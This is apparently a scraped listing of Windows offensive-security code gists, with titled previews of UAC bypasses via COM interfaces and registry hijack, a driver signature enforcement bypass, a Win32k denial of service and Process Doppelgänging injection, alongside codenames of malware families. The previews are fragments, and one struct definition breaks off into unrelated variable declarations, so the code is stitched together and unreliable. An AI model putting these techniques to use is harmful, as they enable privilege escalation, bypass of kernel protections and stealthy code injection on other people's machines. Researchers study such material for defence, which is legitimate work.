akagi (uacme)
akatsuki (uacme)
aoba (dsefix)
fubuki (uacme)
furutaka (tdl)
harasume (zeroaccess)
hibiki (uacme)
ikazuchi (uacme)
inazuma (uacme)
isonami (sxsexp)
// On-disk signature of a BitLocker (FVE) volume boot record; it is the 8-byte
// value expected in the Signature[8] field of the structure below.
#define BITLOCKER_SIGNATURE "-FVE-FS-"
// NOTE(review): sizeof of a string literal counts the terminating NUL, so this
// evaluates to 9, one byte more than the 8-byte Signature field it describes.
// A memcmp/copy against Signature[] with this size would also touch the first
// byte of the following field — confirm whether the intended value is
// sizeof(BITLOCKER_SIGNATURE) - 1 and review the call sites accordingly.
#define BITLOCKER_SIGNATURE_SIZE sizeof(BITLOCKER_SIGNATURE)
#pragma pack(push,1)
typedef struct _FVEFS_BOOT_RECORD {
BYTE JumpCode[3]; //+0x0
BYTE Signature[8]; //+0x3
WORD SectorSize; //+0xB
BYTE SectorsPerCluster; //+0xD
WORD ReservedClusters; //+0xE
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
hfiref0x / main.c
Last active Aug 20, 2020
NtLoadEnclaveData Windows 10 RS3 DSE bypass
// Original source link https://twitter.com/hFireF0X/status/887930221466443776
// If you are here from any other link - do know that they just steal original info without giving any credit to source
// This bug has been fixed in 16273 public build.
#include "global.h"
// Process-wide state shared by the rest of this translation unit. None of these
// are assigned in this excerpt; where they are set is not visible here.
HINSTANCE g_hInstance;          // module handle of this image (HINSTANCE by type)
HANDLE g_ConOut = NULL;         // console output handle — presumably opened at startup; confirm
BOOL g_ConsoleOutput = FALSE;   // presumably selects console vs. redirected output path; confirm against users
WCHAR g_BE = 0xFEFF;            // 0xFEFF is the UTF-16 byte-order mark; presumably emitted ahead of wide text output — confirm
hfiref0x / akagi_41.c
Created Aug 16, 2017
UAC bypass using CMSTPLUA COM interface
// Forward declaration of the COM interface type; `interface` expands to `struct`
// in the Windows SDK headers. The vtable layout that follows must match the
// server's binary layout exactly (method order and count) — the declaration is
// hand-written here rather than generated from an IDL, so verify it against
// the target's type library before use.
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
hfiref0x / akagi_42b.c
Last active Mar 5, 2021
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
// Forward declaration of the COM interface type; `interface` expands to `struct`
// in the Windows SDK headers. As with the hand-written vtable that follows, the
// method order must match the server's binary layout exactly — verify before use.
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
hfiref0x / NtUserOpenDesktop.c
Created Nov 29, 2017
Win32k NtUserOpenDesktop Denial Of Service (9200-17046)
/*
Win32k NtUserOpenDesktop->OpenDesktop Denial Of Service feature.
Working range: x64 Windows 8 (9200) up to Windows 10 RS4 (17046).
x86 versions not tested.
Feature:
hfiref0x / inject.c
Last active Apr 14, 2021
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
hfiref0x / temp.c
Created Jul 24, 2018
DCDv1 unpack
#include <Windows.h>
#include <msdelta.h>
#pragma comment(lib, "msdelta.lib")
BOOL load_file(LPCTSTR FileName, LPDWORD BytesRead, LPVOID *AllocatedBuffer)
{
HANDLE f;
LARGE_INTEGER fsz;
LPVOID buffer = NULL;
hfiref0x / akagi_49a.c
Created Aug 23, 2018
UAC bypass using CreateNewLink COM interface
typedef struct tagCREATELINKDATA {
ULONG dwFlags;
WCHAR szLinkName[MAX_PATH]; // + 0x20C
WCHAR szExeName[MAX_PATH]; // + 0x414
WCHAR szParams[MAX_PATH]; // + 0x61C
WCHAR szWorkingDir[MAX_PATH]; // + 0x824
WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
WCHAR szExpExeName[MAX_PATH]; // + 0xC34
WCHAR szProgDesc[MAX_PATH]; // + 0xE3C
WCHAR szFolder[MAX_PATH]; // + 0x1044